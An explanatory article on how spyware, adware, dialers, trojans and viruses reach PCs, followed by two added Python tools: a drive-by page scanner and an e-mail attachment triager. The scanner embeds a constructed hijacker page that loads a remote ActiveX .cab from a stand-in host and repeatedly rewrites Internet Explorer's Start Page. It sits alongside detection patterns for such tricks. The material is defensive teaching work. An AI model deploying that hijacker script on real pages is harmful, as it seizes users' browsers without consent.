
Methods of Infection

by Shanmuga

P2P wreaks havoc

Almost all spyware and adware arrives bundled with popular free programs, and above all with peer-to-peer clients such as Kazaa, BearShare, Grokster, LimeWire and Morpheus. The bundled components are installed as part of the P2P client's own setup. Cydoor, New.net, TopText, SaveNow, Webhancer, VX2, CommonName, GetNet/ClearSearch, IncrediFind and OnFlow are a few of the applications installed this way; they serve up ad banners and ad messages, or track your Internet surfing habits. Unfortunately, the makers of the host programs do not advertise their programs' hidden payloads. Reading the license agreement carefully during installation will often reveal embedded licenses for the piggybacking adware.

Spyware for FREE, any takers?

Sometimes an application that claims to be free also installs a secondary program. This secondary program monitors your surfing habits and reports them back to a central database. When the user removes the installed application, a component of the program stays behind; the next time the user connects to the Internet, this component re-downloads the rest of the program and reinstalls it.


What are Drive-by-Downloads?

Another scenario: you visit a website that pops up a window with a message along the lines of "in order to properly view this website you must install this program". The HTTP (or FTP) GET request then downloads the software to the client machine. The user performs the installation, and during it is asked for permission to install the malware along with the advertised software. Malware may also be installed simply by visiting a website whose prime aim is to drop spyware onto the client. In that case the installer is embedded within the web page, and ActiveX (a Microsoft technology) is used to install the malware on the client, generally as a browser plug-in. ActiveX is a mechanism that allows components to run inside other applications, here the browser. Once installed this way, the malware runs every time the browser is opened.

ActiveX is Microsoft's answer to the Java technology created by Sun Microsystems and is roughly equivalent to a Java applet. The main thing that you create when writing a program to run in the ActiveX environment is a component, a self-sufficient program that can be run anywhere on your web page. This component, or ActiveX control, could be anything from a scrolling marquee to an animation that is seen on the web page. It could also be an area where the visitor enters information about himself or his credit card. ActiveX is useful in marketing because it can be used to make web pages much more interesting as well as efficient and effective. http://www.upstreamcio.com/glossary.asp

Another common way malware gets into an unprotected system is a visit, in Internet Explorer, to a site that displays an advertisement or a misleading download link you have to click on to continue. That is when the site installs one or more programs on your computer without asking any further permission. These are sometimes referred to as 'drive-by downloads'.

The Vulnerability route

Another method of "infection" is exploiting security holes in Internet Explorer. Even if the user does not click anything on the web page, a malicious site can deliver its malware payload. CoolWebSearch, one of the most notorious pests in recent times, is suspected of being installed by pop-ups that exploit security holes in IE. Merijn Bellekom has fully documented the metamorphosis of CoolWebSearch in his CoolWebSearch Chronicles.

Covert Action

Yet another method uses JavaScript: a web page opens a second page that runs a script. When the surfer closes the first page, the script in the second covertly resets the browser's home page. The script is written so that any time the surfer tries to restore the home page, it is automatically reset again.

A scripting language developed by Netscape to enable Web authors to design interactive sites. Although it shares many of the features and structures of the full Java language, it was developed independently. JavaScript can interact with HTML source code, enabling Web authors to spice up their sites with dynamic content. JavaScript is endorsed by a number of software companies and is an open language that anyone can use without purchasing a license. It is supported by recent browsers from Netscape and Microsoft, though Internet Explorer supports only a subset, which Microsoft calls JScript. http://opal.msu.montana.edu/webteam/docs/glossary.html
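To make the drive-by-download and covert home-page-reset tricks above concrete, here is a small static scanner, added as an example here and not code from this site, that reads a saved page's HTML and reports the tell-tale markers: an <object> tag whose codebase pulls a remote ActiveX control (.cab, .exe and the like), inline script that instantiates ActiveXObject or rewrites Internet Explorer's Start Page registry value, a setInterval loop that would keep undoing the user's change, work hung off the body's onunload handler, and zero-size iframes. The markers and the risk scale are my assumptions about how such pages look, not a complete detector; the two sample pages are constructed for illustration and point at the reserved example.invalid domain and a null CLSID rather than any real site or control.

```python
"""Static triage of a saved HTML page for the drive-by / home-page-hijack
markers discussed above.  Added example, not code from malwarehelp.org;
the patterns are assumptions and the sample pages are constructed."""
import re
from html.parser import HTMLParser

# Assumed markers applied to inline <script> bodies (IE-era techniques).
SCRIPT_PATTERNS = [
    ("activex_object", re.compile(r"new\s+ActiveXObject\s*\(", re.I)),
    ("homepage_setter", re.compile(r"\.setHomePage\s*\(", re.I)),
    ("startpage_regwrite", re.compile(
        r"""RegWrite\s*\(\s*["']HK(?:CU|EY_CURRENT_USER)\\+Software\\+Microsoft"""
        r"""\\+Internet Explorer\\+Main\\+Start Page""", re.I)),
    ("repeating_timer", re.compile(r"setInterval\s*\(", re.I)),
]
# A codebase URL ending in an installable container, optionally with #version=.
INSTALLABLE = re.compile(r"\.(cab|exe|ocx|dll|msi)(?=$|[#?])", re.I)


class DriveByScanner(HTMLParser):
    """Collects (label, evidence) pairs while parsing one page."""

    def __init__(self):
        super().__init__()
        self.findings = []
        self._script = None          # buffer for the current inline script

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}   # attribute names arrive lower-cased
        if tag == "object" and a.get("classid", "").lower().startswith("clsid:"):
            label = ("activex_remote_install" if INSTALLABLE.search(a.get("codebase", ""))
                     else "activex_object_tag")
            self.findings.append((label, a["classid"]))
        elif tag == "body" and "onunload" in a:
            self.findings.append(("unload_handler", a["onunload"]))
        elif tag == "iframe" and self._is_hidden(a):
            self.findings.append(("hidden_iframe", a.get("src", "")))
        elif tag == "script":
            self._script = []

    def handle_data(self, data):
        if self._script is not None:
            self._script.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._script is not None:
            body = "".join(self._script)
            self._script = None
            for label, pattern in SCRIPT_PATTERNS:
                m = pattern.search(body)
                if m:
                    self.findings.append((label, m.group(0)))

    @staticmethod
    def _is_hidden(a):
        style = a.get("style", "").replace(" ", "").lower()
        return (a.get("width") == "0" or a.get("height") == "0"
                or "display:none" in style or "visibility:hidden" in style)


def scan_page(html):
    """Return the sorted, de-duplicated finding labels for one page."""
    s = DriveByScanner()
    s.feed(html)
    s.close()
    return sorted({label for label, _ in s.findings})


def risk_level(labels):
    """Crude triage: an install or Start Page rewrite alone is 'high';
    two or more weaker markers 'medium'; a single marker 'low'."""
    if {"activex_remote_install", "startpage_regwrite", "homepage_setter"} & set(labels):
        return "high"
    if len(labels) >= 2:
        return "medium"
    return "low" if labels else "none"


# Constructed sample: a home-page hijacker of the kind described above.
HIJACK_PAGE = r"""<html><body onunload="reset()">
<object classid="clsid:00000000-0000-0000-0000-000000000000"
        codebase="http://example.invalid/helper.cab#version=1,0,0,0"></object>
<iframe src="http://example.invalid/ads" width="0" height="0"></iframe>
<script type="text/javascript">
function reset() {
  var sh = new ActiveXObject("WScript.Shell");
  sh.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page",
              "http://example.invalid/");
  setInterval(reset, 5000);   // undo the user's change every few seconds
}
</script></body></html>"""

# Constructed sample: an ordinary page with a harmless unload handler.
BENIGN_PAGE = """<html><body onunload="saveDraft()">
<script>function saveDraft() { localStorage.setItem('draft', 'x'); }</script>
</body></html>"""

if __name__ == "__main__":
    for name, page in (("hijack", HIJACK_PAGE), ("benign", BENIGN_PAGE)):
        labels = scan_page(page)
        print(name, risk_level(labels), labels)
```

The scanner only looks at what is literally in the page; a site that builds its script at run time or loads it from a second host will not show these strings, which is exactly why the article's advice to keep the browser patched matters more than any one signature.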

Many dialer programs use hidden windows. The carrier software package masquerades as something useful, such as a free game or a screensaver; after it is installed, the next time the user opens the web browser the dialer opens in a new hidden window, mutes the computer's sound and dials a phone number without the user's permission.

Trojans, on the other hand, can be spread in the guise of literally ANYTHING people find desirable, such as a free game, movie or song. Victims typically download a Trojan from a web archive, receive it through peer-to-peer file exchange (IRC, instant messaging, Kazaa and the like), or simply open an e-mail attachment carelessly. Trojans usually do their damage silently; the first sign of trouble is often when others tell you that you are attacking them or trying to infect them!


Viruses enter your system via e-mail, downloads, infected floppy disks or, occasionally, hacking. You get a virus when you copy infected files to your computer and then activate the code inside them by running the infected application or opening the infected document.
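The Trojan and e-mail routes above share one trick: a program dressed up as a picture, song or document that the victim opens without looking. The following attachment triage is an added example, not code from this site or from any product it mentions. It builds a constructed two-attachment message with Python's standard email library and flags an attachment when its extension is executable, when a decoy extension is stacked in front of it, or when the bytes start with the Windows PE "MZ" header while the part claims to be an image or text. The extension lists and the heuristics are assumptions; a real mail gateway would also unpack archives and check signatures.

```python
"""Triage of e-mail attachments for the disguised-program delivery route
described above.  Added example, not code from malwarehelp.org; the message
is constructed and the heuristics are assumptions, not a complete detector."""
from email import message_from_string, policy
from email.message import EmailMessage

# Extensions Windows runs on double-click, and the 'desirable' decoy
# extensions they are typically hidden behind (assumed lists).
EXEC_EXT = {"exe", "scr", "pif", "com", "bat", "cmd", "vbs", "js", "hta", "msi"}
DECOY_EXT = {"jpg", "jpeg", "gif", "png", "mp3", "avi", "mpg", "doc", "pdf", "txt"}


def triage_attachment(part):
    """Return (filename, [reasons]) for one attachment part."""
    name = (part.get_filename() or "").strip()
    pieces = name.lower().split(".")
    reasons = []
    if len(pieces) >= 2 and pieces[-1] in EXEC_EXT:
        reasons.append("executable_extension")
        if len(pieces) >= 3 and pieces[-2] in DECOY_EXT:
            reasons.append("double_extension")        # e.g. beach.jpg.exe
    payload = part.get_payload(decode=True) or b""
    # A Windows PE file starts with 'MZ'; one declared as image/* or text/* is lying.
    if payload[:2] == b"MZ" and part.get_content_maintype() != "application":
        reasons.append("pe_header_declared_as_" + part.get_content_type())
    return name, reasons


def triage_message(raw):
    """Map suspicious attachment names to their reasons; empty dict if clean."""
    msg = message_from_string(raw, policy=policy.default)
    flagged = {}
    for part in msg.iter_attachments():      # skips the text body itself
        name, reasons = triage_attachment(part)
        if reasons:
            flagged[name] = reasons
    return flagged


def build_sample_mail(with_trojan=True):
    """Constructed message: a PE stub named like a photo, plus a real text file."""
    msg = EmailMessage()
    msg["From"] = "friend@example.invalid"
    msg["To"] = "you@example.invalid"
    msg["Subject"] = "holiday pics!"
    msg.set_content("check out the photos")
    if with_trojan:
        # 64 bytes beginning with the PE magic, labelled as a JPEG (constructed).
        msg.add_attachment(b"MZ" + b"\x90" * 62, maintype="image", subtype="jpeg",
                           filename="beach.jpg.exe")
    msg.add_attachment("just some notes", filename="notes.txt")
    return msg.as_string()


if __name__ == "__main__":
    for name, reasons in triage_message(build_sample_mail()).items():
        print(name, "->", ", ".join(reasons))
```

Note that the check reads the declared filename, not the display name a mail client may truncate; a client that hides known extensions shows "beach.jpg" for the first attachment, which is the whole point of the disguise.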
